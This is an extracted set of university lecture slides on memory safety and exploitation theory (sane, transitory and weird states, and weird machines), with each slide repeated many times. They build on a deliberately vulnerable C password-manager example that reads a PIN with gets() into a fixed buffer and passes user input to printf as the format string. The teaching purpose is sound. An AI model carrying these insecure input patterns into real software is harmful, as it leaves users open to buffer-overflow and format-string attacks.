States
CPU State: Transitory
State: -
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 57: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/57.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Transitory
State: -
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 58: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/58.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Read PIN
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 59: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/59.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Read PIN
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 60: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/60.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Read PIN
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 61: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/61.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Transitory
State: -
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 62: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/62.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: correct?
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 63: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/63.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: correct?
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 64: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/64.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: correct?
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 65: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/65.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Transitory
State: -
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 66: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/66.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 67: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/67.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 68: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/68.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 69: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/69.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 70: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/70.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 71: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/71.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 72: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/72.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 73: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/73.jpg)
Example continued: A Simple Password Manager www.tugraz.at
int main() {
uint32_t pin, correct = 0;
while(1) {
pin = readPIN();
if(pin * 2654435761u == 324783883u)
correct = 1;
if(correct) {
showPasswords();
break;
} else printf("\nWrong PIN!\n");
}
return 0;
}
States
CPU State: Sane
State: Show Password List
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
void showPasswords() {
FILE* stream;
char* l = NULL;
size_t len;
stream = fopen("passwords", "r");
if (stream == NULL) return;
while(getline(&l, &len, stream) != -1)
puts(l);
free(l);
fclose(stream);
}
13 Michael Schwarz — www.iaik.tugraz.at
![Page 74: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/74.jpg)
The Weird State www.tugraz.at
• CPU emulates the FSM
Ñ Should only be in sane or tranistory state
• How can the CPU enter the weird state?
• Programming mistakes
• Broken hardware (e.g., bit flips in memory)
• Hardware bugs (e.g., CPU bugs)
• ...
• Program does not know it is in weird state
14 Michael Schwarz — www.iaik.tugraz.at
![Page 75: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/75.jpg)
The Weird State www.tugraz.at
• CPU emulates the FSM
Ñ Should only be in sane or tranistory state
• How can the CPU enter the weird state?
• Programming mistakes
• Broken hardware (e.g., bit flips in memory)
• Hardware bugs (e.g., CPU bugs)
• ...
• Program does not know it is in weird state
14 Michael Schwarz — www.iaik.tugraz.at
![Page 76: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/76.jpg)
The Weird State www.tugraz.at
• CPU emulates the FSM
Ñ Should only be in sane or tranistory state
• How can the CPU enter the weird state?
• Programming mistakes
• Broken hardware (e.g., bit flips in memory)
• Hardware bugs (e.g., CPU bugs)
• ...
• Program does not know it is in weird state
14 Michael Schwarz — www.iaik.tugraz.at
![Page 77: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/77.jpg)
The Weird State www.tugraz.at
• CPU emulates the FSM
Ñ Should only be in sane or tranistory state
• How can the CPU enter the weird state?
• Programming mistakes
• Broken hardware (e.g., bit flips in memory)
• Hardware bugs (e.g., CPU bugs)
• ...
• Program does not know it is in weird state
14 Michael Schwarz — www.iaik.tugraz.at
![Page 78: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/78.jpg)
Running in the Weird State www.tugraz.at
• Program continues executing
• Transitions might still be applied Ñ on a weird state instead of
a sane state
• Usually transforms one weird state into another weird state
• Weird machine, with many weird states
• We can “program” the weird machine to do something different
than the original FSM
15 Michael Schwarz — www.iaik.tugraz.at
![Page 79: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/79.jpg)
Running in the Weird State www.tugraz.at
• Program continues executing
• Transitions might still be applied Ñ on a weird state instead of
a sane state
• Usually transforms one weird state into another weird state
• Weird machine, with many weird states
• We can “program” the weird machine to do something different
than the original FSM
15 Michael Schwarz — www.iaik.tugraz.at
![Page 80: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/80.jpg)
Running in the Weird State www.tugraz.at
• Program continues executing
• Transitions might still be applied Ñ on a weird state instead of
a sane state
• Usually transforms one weird state into another weird state
• Weird machine, with many weird states
• We can “program” the weird machine to do something different
than the original FSM
15 Michael Schwarz — www.iaik.tugraz.at
![Page 81: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/81.jpg)
Running in the Weird State www.tugraz.at
• Program continues executing
• Transitions might still be applied Ñ on a weird state instead of
a sane state
• Usually transforms one weird state into another weird state
• Weird machine, with many weird states
• We can “program” the weird machine to do something different
than the original FSM
15 Michael Schwarz — www.iaik.tugraz.at
![Page 82: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/82.jpg)
Running in the Weird State www.tugraz.at
• Program continues executing
• Transitions might still be applied Ñ on a weird state instead of
a sane state
• Usually transforms one weird state into another weird state
• Weird machine, with many weird states
• We can “program” the weird machine to do something different
than the original FSM
15 Michael Schwarz — www.iaik.tugraz.at
![Page 83: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/83.jpg)
Programming the Weird Machine www.tugraz.at
• Write program using code Ñ translated into instructions executed by the CPU
• To program a device we have to generate instructions
16 Michael Schwarz — www.iaik.tugraz.at
![Page 84: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/84.jpg)
Programming the Weird Machine www.tugraz.at
• Write program using code Ñ translated into instructions executed by the CPU
• To program a device we have to generate instructions
16 Michael Schwarz — www.iaik.tugraz.at
![Page 85: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/85.jpg)
Programming the Weird Machine www.tugraz.at
• Write program using code Ñ translated into instructions executed by the CPU
• To program a device we have to generate instructions
16 Michael Schwarz — www.iaik.tugraz.at
![Page 86: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/86.jpg)
Instructions as Program www.tugraz.at
• Get rid of the mindset that we require code for programming
• Applications accept input
• Does different things depending on input
Ñ Input programs the application
• Fine if input only leads from one sane state to another sane
state
17 Michael Schwarz — www.iaik.tugraz.at
![Page 87: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/87.jpg)
Instructions as Program www.tugraz.at
• Get rid of the mindset that we require code for programming
• Applications accept input
• Does different things depending on input
Ñ Input programs the application
• Fine if input only leads from one sane state to another sane
state
17 Michael Schwarz — www.iaik.tugraz.at
![Page 88: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/88.jpg)
Instructions as Program www.tugraz.at
• Get rid of the mindset that we require code for programming
• Applications accept input
• Does different things depending on input
Ñ Input programs the application
• Fine if input only leads from one sane state to another sane
state
17 Michael Schwarz — www.iaik.tugraz.at
![Page 89: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/89.jpg)
Instructions as Program www.tugraz.at
• Get rid of the mindset that we require code for programming
• Applications accept input
• Does different things depending on input
Ñ Input programs the application
• Fine if input only leads from one sane state to another sane
state
17 Michael Schwarz — www.iaik.tugraz.at
![Page 90: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/90.jpg)
Instructions as Program www.tugraz.at
• Get rid of the mindset that we require code for programming
• Applications accept input
• Does different things depending on input
Ñ Input programs the application
• Fine if input only leads from one sane state to another sane
state
17 Michael Schwarz — www.iaik.tugraz.at
![Page 91: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/91.jpg)
Instructions as Program in Weird States www.tugraz.at
• If application is in weird state and programmed using input...
• ...the attacker is controlling your computer
• An abstract definition of exploitation
18 Michael Schwarz — www.iaik.tugraz.at
![Page 92: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/92.jpg)
Instructions as Program in Weird States www.tugraz.at
• If application is in weird state and programmed using input...
• ...the attacker is controlling your computer
• An abstract definition of exploitation
18 Michael Schwarz — www.iaik.tugraz.at
![Page 93: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/93.jpg)
Instructions as Program in Weird States www.tugraz.at
• If application is in weird state and programmed using input...
• ...the attacker is controlling your computer
• An abstract definition of exploitation
18 Michael Schwarz — www.iaik.tugraz.at
![Page 94: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/94.jpg)
Exploitation www.tugraz.at
Exploitation: Process starting in a sane state of an FSM
1. Setup: choose the right sane state which “allows” to get to a
weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
with the goal to break the security properties of the FSM
19 Michael Schwarz — www.iaik.tugraz.at
![Page 95: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/95.jpg)
Exploitation www.tugraz.at
Exploitation: Process starting in a sane state of an FSM
1. Setup: choose the right sane state which “allows” to get to a
weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
with the goal to break the security properties of the FSM
19 Michael Schwarz — www.iaik.tugraz.at
![Page 96: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/96.jpg)
Exploitation www.tugraz.at
Exploitation: Process starting in a sane state of an FSM
1. Setup: choose the right sane state which “allows” to get to a
weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
with the goal to break the security properties of the FSM
19 Michael Schwarz — www.iaik.tugraz.at
![Page 97: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/97.jpg)
Exploitation www.tugraz.at
Exploitation: Process starting in a sane state of an FSM
1. Setup: choose the right sane state which “allows” to get to a
weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
with the goal to break the security properties of the FSM
19 Michael Schwarz — www.iaik.tugraz.at
![Page 98: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/98.jpg)
Back to the Example: A Simple Password Manager www.tugraz.at
• We want to enter a weird state
• Can we find a bug in the program?
• Can we abuse it to enter a weird state?
• First hint of a bug when compiling:
pwdman.c:(.text+0x2e): warning: the ‘gets’ function is dangerous
and should not be used.
Ñ Check the man page of gets
20 Michael Schwarz — www.iaik.tugraz.at
![Page 99: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/99.jpg)
Back to the Example: A Simple Password Manager www.tugraz.at
• We want to enter a weird state
• Can we find a bug in the program?
• Can we abuse it to enter a weird state?
• First hint of a bug when compiling:
pwdman.c:(.text+0x2e): warning: the ‘gets’ function is dangerous
and should not be used.
Ñ Check the man page of gets
20 Michael Schwarz — www.iaik.tugraz.at
![Page 100: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/100.jpg)
Back to the Example: A Simple Password Manager www.tugraz.at
• We want to enter a weird state
• Can we find a bug in the program?
• Can we abuse it to enter a weird state?
• First hint of a bug when compiling:
pwdman.c:(.text+0x2e): warning: the ‘gets’ function is dangerous
and should not be used.
Ñ Check the man page of gets
20 Michael Schwarz — www.iaik.tugraz.at
![Page 101: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/101.jpg)
Back to the Example: A Simple Password Manager www.tugraz.at
• We want to enter a weird state
• Can we find a bug in the program?
• Can we abuse it to enter a weird state?
• First hint of a bug when compiling:
pwdman.c:(.text+0x2e): warning: the ‘gets’ function is dangerous
and should not be used.
Ñ Check the man page of gets
20 Michael Schwarz — www.iaik.tugraz.at
